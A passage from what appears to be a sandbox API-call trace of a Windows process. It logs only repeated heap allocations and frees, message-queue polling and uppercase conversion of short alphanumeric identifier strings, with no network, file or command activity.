lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0164.309] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0164.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0164.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0164.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0164.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0164.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0164.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0164.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0164.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0164.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0164.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0164.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0164.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0164.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0164.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0164.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0164.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0164.309] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0164.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0164.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0164.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0164.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0164.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0164.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0164.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0164.310] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0164.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0164.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0164.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0164.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0164.310] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0164.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0164.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0164.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0164.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0164.310] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0164.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0164.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0164.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0164.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0164.310] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.311] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0164.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0164.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0164.311] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0164.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0164.311] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0164.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0164.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0164.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0164.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0164.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0164.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0164.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0164.311] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0164.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0164.311] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0164.311] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0164.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0164.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0164.311] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0164.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0164.311] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0164.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0164.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0164.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0164.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0164.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0164.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0164.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0164.312] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0164.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0164.312] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0164.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0164.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0164.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0164.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0164.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0164.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0164.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0164.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0164.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0164.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0164.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0164.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0164.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0164.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0164.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0164.312] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0164.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0164.312] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0164.312] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0164.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0164.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0164.313] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0164.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0164.313] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0164.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0164.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0164.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0164.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0164.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0164.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0164.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0164.313] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0164.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0164.313] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0164.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0164.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0164.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0164.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0164.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0164.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0164.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0164.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0164.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0164.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0164.313] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0164.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0164.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0164.314] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0164.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0164.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0164.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0164.314] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.314] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0164.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0164.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0164.314] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0164.314] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.314] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0164.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0164.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0164.314] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0164.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0164.314] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0164.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0164.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0164.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0164.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0164.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0164.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0164.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0164.315] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0164.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0164.315] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0164.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0164.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0164.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0164.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0164.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0164.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0164.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0164.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0164.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0164.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0164.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0164.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0164.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0164.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0164.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0164.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0164.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0164.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0164.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0164.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0164.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0164.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0164.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0164.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0164.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0164.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0164.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0164.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0164.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0164.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0164.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0164.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0164.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0164.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0164.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0164.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0164.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0164.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34dd5c0 | out: hHeap=0x25c0000) returned 1 [0164.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0164.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0164.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0164.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0164.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0164.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0164.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0164.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0164.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0164.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0164.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0164.317] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0164.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0164.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0164.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0164.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0164.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0164.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: 